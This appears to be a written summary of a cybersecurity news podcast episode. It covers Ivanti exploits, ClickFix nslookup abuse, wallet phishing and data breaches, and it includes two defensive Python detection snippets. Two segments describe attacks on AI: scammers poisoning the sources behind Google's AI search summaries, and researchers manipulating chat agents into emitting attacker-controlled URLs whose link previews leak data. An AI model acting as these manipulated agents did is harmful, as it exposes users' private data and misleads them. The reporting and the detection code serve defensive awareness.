Cybersecurity Headlines - Detailed Episode Summary
Podcast: CISO Series: Cybersecurity Headlines
Host: Steve Prentice
Date: February 16, 2026
Episode: Ivanti Actor Identified, Search Overviews Manipulated, ClickFix Leverages Nslookup
Episode Overview
This episode covers major new cyber threats and incidents: the principal threat actor behind Ivanti RCE attacks, scammers' exploitation of Google’s AI search summaries, novel DNS abuse in social engineering campaigns, ongoing hardware wallet phishing via snail mail, and the latest data privacy incidents. Throughout, Steve Prentice delivers a concise, matter-of-fact breakdown of each story, with input from leading cybersecurity researchers and official company sources.
Key Discussion Points & Insights
1. Ivanti Endpoint Manager Mobile Exploitation
- [00:09 - 01:00]
- A single threat actor using an IP address on bulletproof hosting infrastructure is behind over 83% of recent exploit activity targeting two Ivanti Endpoint Manager Mobile vulnerabilities, which are being actively exploited as zero-days.
- GreyNoise intelligence connected the activity to the "Prospero"-hosted bulletproof system, which is known to target multiple software products.
- Quote:
"A single IP address hosted on bulletproof infrastructure is responsible for more than 83% of exploitation activity related to vulnerabilities." – Steve Prentice ([00:12])
2. Manipulation of Google’s AI Search Overviews
- [01:01 - 01:54]
- Scammers are injecting malicious content into Google’s AI-generated search summaries by gaming information sources.
- Techniques include creating fake customer service portals, promoting counterfeit products, and circulating convincingly worded misinformation.
- Users are urged to treat AI search overviews as “a starting point that requires verification, rather than as a definitive answer.”
- Quote:
"Google's AI Overviews feature is being weaponized by scammers who have figured out how to inject deliberately harmful information into its AI generated search summaries." – Steve Prentice ([01:05])
3. ClickFix Social Engineering & Abuse of Nslookup
- [01:55 - 02:53]
- Microsoft warns of attackers tricking users into running nslookup commands that contact an external DNS server rather than the system’s default resolver.
- This “ClickFix” technique obfuscates attacks, blending malicious traffic into normal DNS requests and bypassing common web request monitoring.
- Quote:
"Using DNS in this way reduces dependency on traditional web requests and can help blend malicious activity into normal network traffic." – Microsoft Threat Intelligence Team ([02:22])
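
A detection sketch for the behaviour described in this segment, added here as an example and not taken from the episode or from Microsoft: it flags process command lines where nslookup is pointed at a resolver outside an approved set. The resolver allowlist, host names and sample events are constructed placeholders.

```python
import re

# Assumption: resolvers the organisation operates itself (constructed values).
INTERNAL_RESOLVERS = {"10.0.0.53", "dc01.corp.example"}

# Capture everything after "nslookup" up to a shell operator or line end.
NSLOOKUP = re.compile(
    r'(?:^|[\\/\s"\'(])nslookup(?:\.exe)?"?\s+([^|&<>\r\n]*)', re.IGNORECASE
)

def explicit_dns_server(cmdline):
    """Return the DNS server named on an nslookup command line, else None.

    Non-interactive form: nslookup [-option ...] name [server]
    Interactive form:     nslookup - server
    In both, the trailing argument replaces the system's default resolver.
    """
    m = NSLOOKUP.search(cmdline)
    if not m:
        return None
    args = m.group(1).replace('"', " ").replace("'", " ").split()
    if args and args[0] == "-":                      # "nslookup - server"
        return args[1].lower() if len(args) > 1 else None
    positional = [a for a in args if not a.startswith("-")]
    return positional[1].lower() if len(positional) > 1 else None

def flag_events(events):
    """Return (host, server) for nslookup runs that bypass internal resolvers."""
    hits = []
    for ev in events:
        server = explicit_dns_server(ev["cmdline"])
        if server and server not in INTERNAL_RESOLVERS:
            hits.append((ev["host"], server))
    return hits

# Constructed process-creation records; names and addresses are placeholders.
SAMPLE_EVENTS = [
    {"host": "wks-01", "cmdline": "nslookup intranet.corp.example"},
    {"host": "wks-02", "cmdline": 'cmd.exe /c "nslookup -q=txt example.com 192.0.2.10"'},
    {"host": "wks-03", "cmdline": r"C:\Windows\System32\nslookup.exe app.corp.example 10.0.0.53"},
    {"host": "wks-04", "cmdline": 'powershell -c "nslookup example.org 198.51.100.7 | findstr Name"'},
]

if __name__ == "__main__":
    for host, server in flag_events(SAMPLE_EVENTS):
        print(f"{host}: nslookup sent to non-approved resolver {server}")
```

The same rule can be fed from any process-creation telemetry that records the full command line; pairing it with an egress rule that only lets approved resolvers send DNS out of the network covers clients that never produce such a log entry.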
4. Snail Mail Phishing Targets Trezor and Ledger Users
- [02:54 - 03:29]
- Physical mail campaigns are urging users of Trezor and Ledger hardware wallets to submit their recovery phrases for a fake "authentication check."
- Letters feature convincing branding and threaten users with loss of device functionality unless they act urgently.
- Connection drawn to prior data breaches at both companies, which may have exposed user contact info.
- Memorable Moment:
“The letters include company logos and other letterhead features, warning users to complete the process by yesterday… or risk losing functionality…” ([03:03])
5. Estonia’s Spy Chief Calls for Offensive Cyber Investment
- [04:02 - 04:35]
- Kaupo Rosin, Estonia’s foreign intelligence chief, speaking at the Munich Cybersecurity Conference, urges Europe to develop indigenous offensive cyber tools and warns of over-reliance on non-European resources.
- Notes modern intelligence depends not just on defense, but on “the ability to penetrate, disrupt or manipulate adversaries’ digital systems.”
- Quote:
“Europe is focused on defence, while modern intelligence and security operations increasingly depend on the ability to penetrate, disrupt or manipulate adversaries’ digital systems.” – Kaupo Rosin ([04:21])
6. Privacy Fallout: Ring Cancels Partnership with Flock
- [04:36 - 05:14]
- After consumer backlash linked to a Ring Super Bowl ad, Ring cancels partnership plans with Flock Safety (police surveillance tech).
- The ad’s suggestion that Ring cameras could help track lost pets using facial recognition prompted fears over mass surveillance.
- Ring maintains relationships with other surveillance companies, such as Axon.
- Memorable Moment:
“The wording of the ad raised questions about how the facial recognition enabled cameras could also be used to surveil and monitor the movements of people.” ([04:59])
7. Dutch Telco Odido Data Breach
- [05:15 - 05:46]
- Odido, the Netherlands’ largest mobile operator, reports a breach possibly impacting 6.2 million people, involving PII and bank account data.
- No passwords, call details, billing/location data, or ID scans reportedly compromised.
- Notified the Dutch Data Protection Authority immediately after detection.
- Quote:
“The data affected includes PII and bank account numbers… passwords, call details, billing or location data, or scans of ID documents could not have been accessed.” ([05:25])
8. AI Agents Abused for Data-Leaking Links in Messaging Apps
- [05:47 - 06:38]
- PromptArmor researchers find that AI chatbots in messaging platforms can be manipulated into sending URLs which, when previewed by services like Slack or Telegram, leak sensitive data automatically, with no user clicks required.
- Proliferation of “zero-click” exploits in chat interfaces highlights need for extra security against automated preview features.
- Quote:
"These link previews can turn URLs generated by an AI agent and controlled by an attacker into a zero click data exfiltration channel." – Steve Prentice ([06:07])
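
One way to close the preview channel described in this segment, added here as an example and not taken from the episode or the researchers: screen the agent's outgoing message and remove any URL whose host is not allowlisted or that carries a value from the agent's context, so the chat platform has nothing to fetch. The allowlist, host names and the sample secret are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumption: hosts the agent is permitted to link to (constructed values).
ALLOWED_HOSTS = {"docs.corp.example", "wiki.corp.example"}

URL_RE = re.compile(r"https?://[^\s<>\"')\]]+", re.IGNORECASE)

def screen_agent_message(text, sensitive_values):
    """Remove risky URLs from agent output before it is posted to chat.

    A URL is risky if its host is not allowlisted, if it cannot be parsed,
    or if a sensitive value from the agent's context appears in it after
    percent-decoding. Removed URLs are replaced by a defanged host note,
    so the platform's link preview never issues a request for them.
    """
    findings = []

    def check(match):
        url = match.group(0)
        reasons = []
        try:
            host = (urlsplit(url).hostname or "").lower()
        except ValueError:                 # malformed authority, e.g. bad IPv6
            host = ""
            reasons.append("unparseable")
        if host not in ALLOWED_HOSTS and not reasons:
            reasons.append("host-not-allowlisted")
        if any(v and v in unquote(url) for v in sensitive_values):
            reasons.append("embeds-sensitive-value")
        if not reasons:
            return url
        findings.append((host, reasons))
        return "[link removed: %s]" % host.replace(".", "[.]")

    return URL_RE.sub(check, text), findings

# Constructed agent output and context secret, for illustration only.
SAMPLE_SECRETS = ["sk-TEST-1234/abc"]
SAMPLE_MESSAGE = (
    "Summary ready. Details: https://wiki.corp.example/page/42 and "
    "https://collector.example.net/i.png?d=sk-TEST-1234%2Fabc"
)

if __name__ == "__main__":
    safe, findings = screen_agent_message(SAMPLE_MESSAGE, SAMPLE_SECRETS)
    print(safe)
    print(findings)
```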
Notable Quotes & Memorable Moments (with timestamps)
- "Google's AI Overviews feature is being weaponized by scammers…" – Steve Prentice ([01:05])
- "Using DNS in this way reduces dependency on traditional web requests…" – Microsoft ([02:22])
- "The letters include company logos and other letterhead features…" ([03:03])
- "Europe is focused on defence, while modern intelligence and security operations increasingly depend on the ability to penetrate, disrupt or manipulate adversaries’ digital systems." – Kaupo Rosin ([04:21])
- "The wording of the ad raised questions about how the facial recognition enabled cameras could also be used to surveil and monitor the movements of people." – Steve Prentice ([04:59])
- "These link previews can turn URLs generated by an AI agent and controlled by an attacker into a zero click data exfiltration channel." – Steve Prentice ([06:07])
Segment Timestamps for Reference
- [00:09] — Ivanti RCE threat actor identified
- [01:01] — Google AI Overviews manipulated
- [01:55] — ClickFix/NSLookup DNS attacks
- [02:54] — Trezor/Ledger snail mail phishing
- [04:02] — Estonia pushes for offensive cyber capability
- [04:36] — Ring/Flock partnership canceled after ad backlash
- [05:15] — Odido data breach
- [05:47] — AI agents create data-leaking links in chat apps
Tone and Language
Steve Prentice’s delivery is clear, urgent, and pragmatic, emphasizing the immediacy and risks inherent in each headline. Direct expert statements and practical warnings are given in a succinct yet informative style, mirroring the fast-paced tone of cybersecurity news cycles.
This episode is essential listening for infosec professionals keen to stay ahead of evolving attack vectors—from AI exploitation to DNS-based payload delivery—along with critical updates on privacy policy, data breaches, and global cyber strategy.
